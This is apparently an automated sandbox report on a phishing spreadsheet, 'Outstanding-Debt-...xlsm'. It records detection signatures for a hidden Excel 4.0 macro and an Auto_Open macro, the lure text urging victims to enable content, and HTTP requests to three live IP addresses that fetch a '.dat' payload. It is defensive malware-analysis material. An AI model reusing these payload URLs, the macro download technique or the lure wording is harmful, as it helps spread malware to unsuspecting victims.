Loading ...

Play interactive tourEdit tour

Analysis Report Outstanding-Debt-1754918061-05042021.xlsm

Overview

General Information

Sample Name:Outstanding-Debt-1754918061-05042021.xlsm
Analysis ID:404114
MD5:5ac72cad6c794e97474276ba534aa095
SHA1:5236650b529792d7aa754c62e1db170a62ecc13d
SHA256:06b4a994cc6b9629775ebfcf818cd44267af85d7515980d4edc3c174ac47b6da
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:64
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malicious Excel 4.0 Macro
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Found Excel 4.0 Macro with suspicious formulas
Allocates a big amount of memory (probably used for heap spraying)
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
IP address seen in connection with other malware
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 1928 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior

Software Vulnerabilities:

barindex
Document exploit detected (UrlDownloadToFile)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileAJump to behavior
Source: excel.exeMemory has grown: Private usage: 4MB later: 34MB
Source: global trafficTCP traffic: 192.168.2.22:49165 -> 91.211.91.81:80
Source: global trafficTCP traffic: 192.168.2.22:49165 -> 91.211.91.81:80
Source: Joe Sandbox ViewIP Address: 91.211.91.81 91.211.91.81
Source: Joe Sandbox ViewIP Address: 5.34.179.36 5.34.179.36
Source: global trafficHTTP traffic detected: GET /44313,6048108796.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 91.211.91.81Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /44313,6048108796.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 5.34.179.36Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /44313,6048108796.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 45.153.229.23Connection: Keep-Alive
Source: unknownTCP traffic detected without corresponding DNS query: 91.211.91.81
Source: unknownTCP traffic detected without corresponding DNS query: 91.211.91.81
Source: unknownTCP traffic detected without corresponding DNS query: 91.211.91.81
Source: unknownTCP traffic detected without corresponding DNS query: 91.211.91.81
Source: unknownTCP traffic detected without corresponding DNS query: 5.34.179.36
Source: unknownTCP traffic detected without corresponding DNS query: 5.34.179.36
Source: unknownTCP traffic detected without corresponding DNS query: 5.34.179.36
Source: unknownTCP traffic detected without corresponding DNS query: 5.34.179.36
Source: unknownTCP traffic detected without corresponding DNS query: 45.153.229.23
Source: unknownTCP traffic detected without corresponding DNS query: 45.153.229.23
Source: unknownTCP traffic detected without corresponding DNS query: 45.153.229.23
Source: unknownTCP traffic detected without corresponding DNS query: 45.153.229.23
Source: unknownTCP traffic detected without corresponding DNS query: 91.211.91.81
Source: unknownTCP traffic detected without corresponding DNS query: 5.34.179.36
Source: unknownTCP traffic detected without corresponding DNS query: 45.153.229.23
Source: unknownTCP traffic detected without corresponding DNS query: 45.153.229.23
Source: unknownTCP traffic detected without corresponding DNS query: 5.34.179.36
Source: unknownTCP traffic detected without corresponding DNS query: 91.211.91.81
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7533C53B.jpgJump to behavior
Source: global trafficHTTP traffic detected: GET /44313,6048108796.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 91.211.91.81Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /44313,6048108796.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 5.34.179.36Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /44313,6048108796.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 45.153.229.23Connection: Keep-Alive

System Summary:

barindex
Found malicious Excel 4.0 MacroShow sources
Source: Outstanding-Debt-1754918061-05042021.xlsmInitial sample: urlmon
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
Source: Screenshot number: 4Screenshot OCR: Enable editing button from the yellow bar above 22 0 Once you have enabled editing please click Ena
Source: Screenshot number: 4Screenshot OCR: Enable Content button from the yellow bar above 23 24 25 26 27 28 29 30 31 32 33 34 35
Found Excel 4.0 Macro with suspicious formulasShow sources
Source: Outstanding-Debt-1754918061-05042021.xlsmInitial sample: EXEC
Source: Outstanding-Debt-1754918061-05042021.xlsmOLE, VBA macro line: Private Sub Auto_Open()
Source: Outstanding-Debt-1754918061-05042021.xlsmOLE indicator, VBA macros: true
Source: classification engineClassification label: mal64.expl.evad.winXLSM@1/8@0/3
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$Outstanding-Debt-1754918061-05042021.xlsmJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRD4AC.tmpJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEWindow found: window name: SysTabControl32Jump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: Outstanding-Debt-1754918061-05042021.xlsmInitial sample: OLE zip file path = xl/media/image1.jpg
Source: Outstanding-Debt-1754918061-05042021.xlsmInitial sample: OLE zip file path = xl/drawings/drawing2.xml
Source: Outstanding-Debt-1754918061-05042021.xlsmInitial sample: OLE zip file path = xl/worksheets/_rels/sheet2.xml.rels
Source: Outstanding-Debt-1754918061-05042021.xlsmInitial sample: OLE zip file path = xl/drawings/_rels/drawing2.xml.rels
Source: Outstanding-Debt-1754918061-05042021.xlsmInitial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsScripting22Path InterceptionExtra Window Memory Injection1Masquerading1OS Credential DumpingFile and Directory Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumNon-Application Layer Protocol1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsExploitation for Client Execution12Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemorySystem Information Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothApplication Layer Protocol11Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Scripting22Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationIngress Tool Transfer2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Extra Window Memory Injection1NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
Outstanding-Debt-1754918061-05042021.xlsm2%ReversingLabsWin32.Trojan.Generic

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://45.153.229.23/44313,6048108796.dat5%VirustotalBrowse
http://45.153.229.23/44313,6048108796.dat0%Avira URL Cloudsafe
http://5.34.179.36/44313,6048108796.dat3%VirustotalBrowse
http://5.34.179.36/44313,6048108796.dat0%Avira URL Cloudsafe
http://91.211.91.81/44313,6048108796.dat5%VirustotalBrowse
http://91.211.91.81/44313,6048108796.dat0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

No contacted domains info

Contacted URLs

NameMaliciousAntivirus DetectionReputation
http://45.153.229.23/44313,6048108796.datfalse
  • 5%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
http://5.34.179.36/44313,6048108796.datfalse
  • 3%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
http://91.211.91.81/44313,6048108796.datfalse
  • 5%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown

Contacted IPs

  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Public

IPDomainCountryFlagASNASN NameMalicious
91.211.91.81
unknownUkraine
206638HOSTFORYUAfalse
5.34.179.36
unknownUkraine
204957GREENFLOID-ASUAfalse
45.153.229.23
unknownRussian Federation
25229VOLIA-ASUAfalse

General Information

Joe Sandbox Version:32.0.0 Black Diamond
Analysis ID:404114
Start date:04.05.2021
Start time:18:23:38
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 4m 50s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:Outstanding-Debt-1754918061-05042021.xlsm
Cookbook file name:defaultwindowsofficecookbook.jbs
Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Run name:Without Instrumentation
Number of analysed new started processes analysed:4
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Detection:MAL
Classification:mal64.expl.evad.winXLSM@1/8@0/3
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Found application associated with file extension: .xlsm
  • Found Word or Excel or PowerPoint or XPS Viewer
  • Attach to Office via COM
  • Scroll down
  • Close Viewer
Warnings:
Show All
  • Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
91.211.91.81Outstanding-Debt-170373600-05042021.xlsmGet hashmaliciousBrowse
  • 91.211.91.81/44313,6048108796.dat
Outstanding-Debt-1754918061-05042021.xlsmGet hashmaliciousBrowse
  • 91.211.91.81/44313,6048108796.dat
Outstanding-Debt-439798376-05042021.xlsmGet hashmaliciousBrowse
  • 91.211.91.81/44313,6048108796.dat
Outstanding-Debt-1754918061-05042021.xlsmGet hashmaliciousBrowse
  • 91.211.91.81/44313,6048108796.dat
Outstanding-Debt-439798376-05042021.xlsmGet hashmaliciousBrowse
  • 91.211.91.81/44313,6048108796.dat
Outstanding-Debt-439798376-05042021.xlsmGet hashmaliciousBrowse
  • 91.211.91.81/44313,6048108796.dat
Outstanding-Debt-1636503299-05042021.xlsmGet hashmaliciousBrowse
  • 91.211.91.81/44313,6048108796.dat
Outstanding-Debt-1636503299-05042021.xlsmGet hashmaliciousBrowse
  • 91.211.91.81/44313,6048108796.dat
Outstanding-Debt-1636503299-05042021.xlsmGet hashmaliciousBrowse
  • 91.211.91.81/44313,6048108796.dat
5.34.179.36Outstanding-Debt-170373600-05042021.xlsmGet hashmaliciousBrowse
  • 5.34.179.36/44313,6048108796.dat
Outstanding-Debt-1754918061-05042021.xlsmGet hashmaliciousBrowse
  • 5.34.179.36/44313,6048108796.dat
Outstanding-Debt-439798376-05042021.xlsmGet hashmaliciousBrowse
  • 5.34.179.36/44313,6048108796.dat
Outstanding-Debt-1754918061-05042021.xlsmGet hashmaliciousBrowse
  • 5.34.179.36/44313,6048108796.dat
Outstanding-Debt-439798376-05042021.xlsmGet hashmaliciousBrowse
  • 5.34.179.36/44313,6048108796.dat
Outstanding-Debt-439798376-05042021.xlsmGet hashmaliciousBrowse
  • 5.34.179.36/44313,6048108796.dat
Outstanding-Debt-1636503299-05042021.xlsmGet hashmaliciousBrowse
  • 5.34.179.36/44313,6048108796.dat
Outstanding-Debt-1636503299-05042021.xlsmGet hashmaliciousBrowse
  • 5.34.179.36/44313,6048108796.dat
Outstanding-Debt-1636503299-05042021.xlsmGet hashmaliciousBrowse
  • 5.34.179.36/44313,6048108796.dat

Domains

No context

ASN

MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
GREENFLOID-ASUAOutstanding-Debt-170373600-05042021.xlsmGet hashmaliciousBrowse
  • 5.34.179.36
Outstanding-Debt-1754918061-05042021.xlsmGet hashmaliciousBrowse
  • 5.34.179.36
Outstanding-Debt-439798376-05042021.xlsmGet hashmaliciousBrowse
  • 5.34.179.36
Outstanding-Debt-1754918061-05042021.xlsmGet hashmaliciousBrowse
  • 5.34.179.36
Outstanding-Debt-439798376-05042021.xlsmGet hashmaliciousBrowse
  • 5.34.179.36
Outstanding-Debt-439798376-05042021.xlsmGet hashmaliciousBrowse
  • 5.34.179.36
Outstanding-Debt-1636503299-05042021.xlsmGet hashmaliciousBrowse
  • 5.34.179.36
Outstanding-Debt-1636503299-05042021.xlsmGet hashmaliciousBrowse
  • 5.34.179.36
Outstanding-Debt-1636503299-05042021.xlsmGet hashmaliciousBrowse
  • 5.34.179.36
tetup.exeGet hashmaliciousBrowse
  • 107.181.174.176
ba820cf3_by_Libranalysis.exeGet hashmaliciousBrowse
  • 195.123.238.191
a8331229_by_Libranalysis.exeGet hashmaliciousBrowse
  • 195.123.238.191
5f0e0f15_by_Libranalysis.exeGet hashmaliciousBrowse
  • 195.123.238.191
2f50000.exeGet hashmaliciousBrowse
  • 45.90.59.62
9177284661-04302021.xlsmGet hashmaliciousBrowse
  • 82.118.21.70
9177284661-04302021.xlsmGet hashmaliciousBrowse
  • 82.118.21.70
9177284661-04302021.xlsmGet hashmaliciousBrowse
  • 82.118.21.70
EgW5u2WYG2.exeGet hashmaliciousBrowse
  • 45.134.255.99
7IXb5bOTOQ.exeGet hashmaliciousBrowse
  • 45.134.255.61
DU61r0xvZ7.exeGet hashmaliciousBrowse
  • 82.118.23.184
HOSTFORYUAOutstanding-Debt-170373600-05042021.xlsmGet hashmaliciousBrowse
  • 91.211.91.81
Outstanding-Debt-1754918061-05042021.xlsmGet hashmaliciousBrowse
  • 91.211.91.81
Outstanding-Debt-439798376-05042021.xlsmGet hashmaliciousBrowse
  • 91.211.91.81
Outstanding-Debt-1754918061-05042021.xlsmGet hashmaliciousBrowse
  • 91.211.91.81
Outstanding-Debt-439798376-05042021.xlsmGet hashmaliciousBrowse
  • 91.211.91.81
Outstanding-Debt-439798376-05042021.xlsmGet hashmaliciousBrowse
  • 91.211.91.81
Outstanding-Debt-1636503299-05042021.xlsmGet hashmaliciousBrowse
  • 91.211.91.81
Outstanding-Debt-1636503299-05042021.xlsmGet hashmaliciousBrowse
  • 91.211.91.81
Outstanding-Debt-1636503299-05042021.xlsmGet hashmaliciousBrowse
  • 91.211.91.81
Complaint-1770799750-04302021.xlsmGet hashmaliciousBrowse
  • 2.56.244.189
Complaint-1770799750-04302021.xlsmGet hashmaliciousBrowse
  • 2.56.244.189
Complaint-1505499457-04302021.xlsmGet hashmaliciousBrowse
  • 2.56.244.189
Complaint-1770799750-04302021.xlsmGet hashmaliciousBrowse
  • 2.56.244.189
Complaint-1505499457-04302021.xlsmGet hashmaliciousBrowse
  • 2.56.244.189
Complaint-1505499457-04302021.xlsmGet hashmaliciousBrowse
  • 2.56.244.189
Complaint-937314470-04302021.xlsmGet hashmaliciousBrowse
  • 2.56.244.189
Complaint-937314470-04302021.xlsmGet hashmaliciousBrowse
  • 2.56.244.189
Complaint-793844517-04302021.xlsmGet hashmaliciousBrowse
  • 2.56.244.189
Complaint-937314470-04302021.xlsmGet hashmaliciousBrowse
  • 2.56.244.189
Complaint-793844517-04302021.xlsmGet hashmaliciousBrowse
  • 2.56.244.189
VOLIA-ASUAOutstanding-Debt-170373600-05042021.xlsmGet hashmaliciousBrowse
  • 45.153.229.23
Outstanding-Debt-1754918061-05042021.xlsmGet hashmaliciousBrowse
  • 45.153.229.23
Outstanding-Debt-439798376-05042021.xlsmGet hashmaliciousBrowse
  • 45.153.229.23
Outstanding-Debt-1754918061-05042021.xlsmGet hashmaliciousBrowse
  • 45.153.229.23
Outstanding-Debt-439798376-05042021.xlsmGet hashmaliciousBrowse
  • 45.153.229.23
Outstanding-Debt-439798376-05042021.xlsmGet hashmaliciousBrowse
  • 45.153.229.23
Outstanding-Debt-1636503299-05042021.xlsmGet hashmaliciousBrowse
  • 45.153.229.23
Outstanding-Debt-1636503299-05042021.xlsmGet hashmaliciousBrowse
  • 45.153.229.23
Outstanding-Debt-1636503299-05042021.xlsmGet hashmaliciousBrowse
  • 45.153.229.23
7D1E.exeGet hashmaliciousBrowse
  • 77.123.139.190
2f50000.exeGet hashmaliciousBrowse
  • 91.203.5.165
jX16Cu330u.exeGet hashmaliciousBrowse
  • 77.123.139.190
5jHZqgYHCZ.exeGet hashmaliciousBrowse
  • 77.123.139.190
z3LOkpYy4s.exeGet hashmaliciousBrowse
  • 77.123.139.190
dl6jAtWJeR.exeGet hashmaliciousBrowse
  • 77.123.139.190
YVNw1T4L7m.exeGet hashmaliciousBrowse
  • 77.123.139.190
QsO4ETjF7s.exeGet hashmaliciousBrowse
  • 77.123.139.190
Rk5T3e6g5m.exeGet hashmaliciousBrowse
  • 77.123.139.190
9b3d7f02.exeGet hashmaliciousBrowse
  • 91.203.5.155
a5DohSoj1A.exeGet hashmaliciousBrowse
  • 77.123.139.190

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7533C53B.jpg
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:[TIFF image data, big-endian, direntries=5], baseline, precision 8, 1080x1080, frames 3
Category:dropped
Size (bytes):92379
Entropy (8bit):7.654577060340879
Encrypted:false
SSDEEP:1536:1o1vutINbjOXGw548LBkVb/oyrKXkX89DcO9GQSnIv+C1EDFVxkR7Y90:wvKINbjvw548LMb/oqKO8NnS8+60Kc0
MD5:4A425E6A5A885C0D0E2589506FD2244B
SHA1:E23482422480A4720E22F311B42BD65E2F3556F8
SHA-256:76E685FC2035D8CF19945C6686D82054B64D0A9612853D8F428C4B4FE351C160
SHA-512:3C827E13A12CC817CBD80EA7C89BEC5288FD21250728E76E00D6355008F704C77EC9BC37C85FF076D8D1F960DB53741F352AB649CD2C754B71B4D11CFFBEEA54
Malicious:false
Reputation:moderate, very likely benign file
Preview: ......JFIF.....`.`.....ZExif..MM.*.................J............Q...........Q...........Q..........................C....................................................................C.......................................................................8.8.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..D.G.\.....i].......k.@U.........B..Hw.A...`p;.RsIRHTs..%G?QU.#..$..."...U.A....g].s......c..,....{W'..M.Nc....F.~..y..l..`.e..a..[...P.y]..k_..CI..z.Ru..s.6.Y....."..1]Q......e#.......~.`sk..KH......p.4.i.j+3{.....N.DS..L.....o..o.5f>..jY.uS...Z.B...UG`)..6D....(.....
C:\Users\user\AppData\Local\Temp\F4EE0000
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:data
Category:dropped
Size (bytes):117678
Entropy (8bit):7.689108187269306
Encrypted:false
SSDEEP:3072:GDFrvKINbjvw548LMb/oqKO8NnS8+60Kcw:GDFmAbT648LM7D98Np+ED
MD5:CEA796E861FFF39C3EAD50BBF15DDDEC
SHA1:657BDBAC6816E40E3E39A90548B2B904DBEEEC6C
SHA-256:58DCB51BA98FDC5A8F1F4D649D08C3AAF7F3A9E1A133F46C38BC3299AF589385
SHA-512:0B02B8B188B51C833BE75179680F12A82DDABCAA3D55C3F3DE0E57212380B1CDCD20069B29E043266D7D3A30D056144E3AF5C1C235B9BFAF40D9D3785DF98469
Malicious:false
Reputation:low
Preview: .U.n.0....?...".....r.y...I>.&..m.$H...K...$$@.zQ;.3\p..V.K.AYS..:"..a.2uE...._.....5P.5.r=..m..v...6."M..7cA4..@...+3.[.....q..5.....k".X.A&.[.......~.t2U..7...UE.sZ...Q.4..... .xi........VS..2.G.....rz.a..V....Xh..?P....rZ.....T..;..._.A.$....?.E..J.W..Sk..<or..%..h.-.-....>.k\.7Qg.re`.v........$.........5d..............4?{.:.&...,_?>?......B.-CFu....p..1.T.z..cw.!=.M-....}.....3..7...r.......;ap.7.B.e.N[...v......z..T]:........c.`.Nx....W.<..r.O........PK..........!.........*.......[Content_Types].xml ...(.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:data
Category:dropped
Size (bytes):162688
Entropy (8bit):4.25430976832062
Encrypted:false
SSDEEP:1536:C61L3FNSc8SetKB96vQVCBumVMOej6mXmYarrJQcd1FaLcm48s:CgJNSc83tKBAvQVCgOtmXmLpLm4l
MD5:CA4993927BAA93DC2320A4B540D529DA
SHA1:D09E65692992B7CCF20689225D265F7E5FEA29E9
SHA-256:CE27AD38DBC7F39B713741FF2F4C9F9EB9427FAD5F236DB82D7DECD70AB4FA72
SHA-512:A0E7069E05343C9CF8E0D5A611BD215F069DF33F208F2A0895871796FDE3684BF957901632586B337E18AB8424B1C5B2132A558F55B65EA537666E062FA6425E
Malicious:false
Reputation:low
Preview: MSFT................Q................................#......$....... ...................d.......,...........X....... ...........L...........x.......@...........l.......4...........`.......(...........T...................H...........t.......<...........h.......0...........\.......$...........P...........|.......D...........p.......8...........d.......,...........X....... ...........L...........x.......@........ ..l ... ..4!...!...!..`"..."..(#...#...#..T$...$...%...%...%..H&...&...'..t'...'..<(...(...)..h)...)..0*...*...*..\+...+..$,...,...,..P-...-......|.......D/.../...0..p0...0..81...1...2..d2...2..,3...3...3..X4...4.. 5...5...5..L6...6...7..x7...7..@8.......8..............................$................................................................................x..xG..............T........................................... ...........................................................&!..............................................................................................
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Wed May 5 00:24:44 2021, atime=Wed May 5 00:24:44 2021, length=8192, window=hide
Category:dropped
Size (bytes):867
Entropy (8bit):4.4868984204114435
Encrypted:false
SSDEEP:12:85QzLgXg/XAlCPCHaX2B8GB/bWGyxX+Wnicvb3bDtZ3YilMMEpxRljKY6TdJP9TK:85c/XTm6G4xYePDv3qqrNru/
MD5:F8F333EFB85DBA7D9F14E509AD034E2F
SHA1:C771159ACC15D8E4BEC44661ED64D25D88D465DF
SHA-256:90782C7345EDBB7A68A1F71872B2305C19BE146734FFA1AB25386B79C716F83E
SHA-512:F13A4B83F3FE4D1C0D91F863EDC549A02F56160491323921B58066C7A73507CA69A9A452B939877F855B8E91324281CD957049E1AA148FB0B656F50E5DCCBCB1
Malicious:false
Reputation:low
